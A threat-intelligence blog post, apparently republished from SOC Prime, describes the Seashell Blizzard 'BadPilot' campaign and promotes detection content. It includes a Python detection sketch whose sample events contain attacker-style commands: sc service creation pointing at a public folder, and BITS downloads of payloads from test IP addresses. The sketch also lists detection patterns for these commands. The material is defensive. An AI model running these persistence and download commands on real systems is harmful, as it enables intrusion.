
Seashell Blizzard Attack Detection: A Long-Running Cyber-Espionage “BadPilot” Campaign by russian-linked Hacking Group  – Source: socprime.com


Source: socprime.com – Author: Veronika Telychko

The nefarious russia-linked APT group Seashell Blizzard, also known as APT44, has been waging global cyber campaigns since at least 2009. Defenders recently spotted a new long-running access campaign called “BadPilot,” reinforcing the group’s focus on stealthy initial infiltration and its use of a set of advanced detection evasion techniques.

Detect Seashell Blizzard Attacks

For more than a decade, the russia-backed Seashell Blizzard APT group – also tracked as UAC-0145, APT44 or Sandworm – has persistently targeted Ukraine, focusing on critical sectors. Since the full-scale invasion, this GRU-linked military cyber-espionage unit has escalated its activity, using Ukraine as a testing ground to refine its malicious TTPs before expanding its offensive campaigns to global targets.

SOC Prime Platform for collective cyber defense equips security professionals with a set of curated detection algorithms to proactively withstand Seashell Blizzard operations backed by a complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection. Just click the Explore Detections button below and immediately drill down to a relevant detection stack. 

Explore Detections

All the rules are compatible with multiple SIEM, EDR, and Data Lake platforms and mapped to MITRE ATT&CK to streamline threat investigation. Additionally, each rule is enriched with extensive metadata, including CTI references, attack timelines, triage recommendations, audit configurations, and more. 

For more detection content against related malicious activity associated with the notorious russia-linked cyber-espionage collective known under diverse monikers and identifiers, apply the following tags “Sandworm,” “APT44,” or “Seashell Blizzard” to streamline your search across SOC Prime Platform.

Seashell Blizzard Operations Analysis

Seashell Blizzard, also tracked as APT44, Sandworm, Voodoo Bear, or UAC-0082, is a high-impact russian hacking collective tied to GRU Unit 74455. Active for over a decade, the threat actors have conducted widespread adversary campaigns targeting organizations in the U.S., Canada, Australia, Europe, and Asia.

Known for maintaining stealthy access to impacted systems, adversaries use a mix of open-source and custom-built tools to carry out cyber espionage. The group shows a strong interest in ICS and SCADA environments, with previous attacks resulting in major disruptions to essential infrastructure, with a notable impact on energy systems.

AttackIQ researchers have recently shed light on the group’s BadPilot campaign, a stealthy and prolonged operation aimed at breaching targeted networks. The campaign primarily leverages spear-phishing emails and security flaws to infiltrate systems. After gaining a foothold, access is often handed off to other adversaries within the group to proceed with further exploitation and intelligence gathering.

Notably, Seashell Blizzard has targeted Ukraine since russia’s full-fledged invasion of the country. In April 2022, CERT-UA, alongside Microsoft and ESET, issued a warning regarding the world’s second-ever power outage caused by a cyberattack, traced back to UAC-0082 (aka Seashell Blizzard). The attackers used Industroyer2, a new variant of the infamous Industroyer malware, paired with the notorious CaddyWiper malware.

In the latest BadPilot campaign, hackers employ highly persistent techniques to sustain access, even after system reboots or password changes, by altering or creating Windows services. They achieve this using built-in Windows utilities, specifically the sc command-line tool, to set up new services and confirm that they exist. To stay under the radar, they also abuse the Windows BITS component, which lets them stealthily deploy malware samples during periods of low system activity, blending in with normal network operations.
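The two behaviours described above (service creation or reconfiguration via sc.exe followed by a confirming query, and BITS transfers used to stage payloads) are exactly what process-creation telemetry can surface. The following detection sketch is an added example, not code from SOC Prime or from the BadPilot research. It assumes process-creation events (Sysmon Event ID 1 or Security 4688) reduced to `host`, `user`, `image` and `cmdline` fields; the hosts, users, service names and URLs in the sample events are constructed. It maps hits to ATT&CK T1543.003 (Windows Service) and T1197 (BITS Jobs), raises severity when the new service binary lives in a user-writable path, and only flags an `sc query` when the same host previously created or reconfigured that service, so routine service checks stay quiet.

```python
import ntpath
import re
from dataclasses import dataclass

# Constructed sample events in the shape of Sysmon Event ID 1 / Security 4688
# process-creation records, reduced to the fields the detection needs.
# Hosts, users, service names and URLs (RFC 5737 test addresses) are invented.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r'sc.exe create UpdSvc binPath= "C:\Users\Public\upd.exe" start= auto'},
    {"host": "ws01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r"sc.exe query UpdSvc"},
    {"host": "ws02", "user": "NT AUTHORITY\\SYSTEM", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin.exe /transfer job1 /download /priority low http://198.51.100.7/x.bin C:\Users\Public\x.bin"},
    {"host": "ws03", "user": "CORP\\helpdesk", "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r"sc.exe query Spooler"},
    {"host": "ws04", "user": "CORP\\bob", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Start-BitsTransfer -Source http://203.0.113.9/p.bin -Destination C:\ProgramData\p.bin"'},
    {"host": "ws05", "user": "CORP\\alice", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe notes.txt"},
]

SERVICE_MOD_VERBS = {"create", "config"}            # set up or alter a service (T1543.003)
SERVICE_CONFIRM_VERBS = {"query", "qc", "start"}    # confirm the new service exists / runs
BITS_JOB_SWITCHES = {"/transfer", "/create", "/addfile", "/resume", "/setnotifycmdline"}
# Paths a low-privileged user can write to; a service binary here is suspicious.
USER_WRITABLE = re.compile(r"\\(users\\public|programdata|windows\\temp|appdata)\\", re.I)


@dataclass
class Finding:
    host: str
    technique: str   # MITRE ATT&CK technique ID
    severity: str
    reason: str
    cmdline: str


def detect(events):
    """Run the service-persistence and BITS detections over an ordered event list."""
    findings = []
    modified = {}  # (host, service name) -> True once sc create/config was seen
    for ev in events:
        exe = ntpath.basename(ev["image"]).lower()
        tokens = ev["cmdline"].split()
        if exe == "sc.exe":
            args = tokens[1:]
            if args and args[0].startswith("\\\\"):   # optional \\server target
                args = args[1:]
            if len(args) < 2:
                continue
            verb, svc = args[0].lower(), args[1]
            key = (ev["host"], svc.lower())
            if verb in SERVICE_MOD_VERBS:
                modified[key] = True
                sev = "high" if USER_WRITABLE.search(ev["cmdline"]) else "medium"
                findings.append(Finding(ev["host"], "T1543.003", sev,
                                        f"sc {verb} on service {svc}", ev["cmdline"]))
            elif verb in SERVICE_CONFIRM_VERBS and key in modified:
                # The "confirm" step: only interesting after a change on the same host.
                findings.append(Finding(ev["host"], "T1543.003", "low",
                                        f"sc {verb} confirms earlier change to {svc}", ev["cmdline"]))
        elif exe == "bitsadmin.exe":
            if {t.lower() for t in tokens} & BITS_JOB_SWITCHES:
                findings.append(Finding(ev["host"], "T1197", "medium",
                                        "bitsadmin job created or resumed", ev["cmdline"]))
        elif exe in ("powershell.exe", "pwsh.exe") and "start-bitstransfer" in ev["cmdline"].lower():
            findings.append(Finding(ev["host"], "T1197", "medium",
                                    "Start-BitsTransfer invoked from PowerShell", ev["cmdline"]))
    return findings


def count_by_technique(findings):
    """Summarise findings per ATT&CK technique for a quick triage view."""
    counts = {}
    for f in findings:
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.host:5} {f.technique:10} {f.severity:6} {f.reason}")
```

Run over the sample events, the detector reports the `sc create` into `C:\Users\Public` as high, the follow-up `sc query UpdSvc` as a low-severity confirmation, and both BITS transfers as medium, while the help-desk `sc query Spooler` on a host with no prior service change produces nothing. In production the same logic would also correlate Security Event ID 4697 (service installed) and BITS client operational logs, which do not depend on the attacker going through sc.exe or bitsadmin.exe.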

To minimize the risks of Seashell Blizzard operations, security teams should consistently evaluate their defenses. SOC Prime Platform for collective cyber defense offers a future-proof enterprise-ready product suite backed by AI, automation, and actionable threat intelligence to ensure businesses can gain a competitive edge over increasing adversary capabilities. 

Original Post URL: https://socprime.com/blog/seashell-blizzard-attack-detection/

Category & Tags: Blog, Latest Threats, APT, APT44, BadPilot, Sandworm, Seashell Blizzard


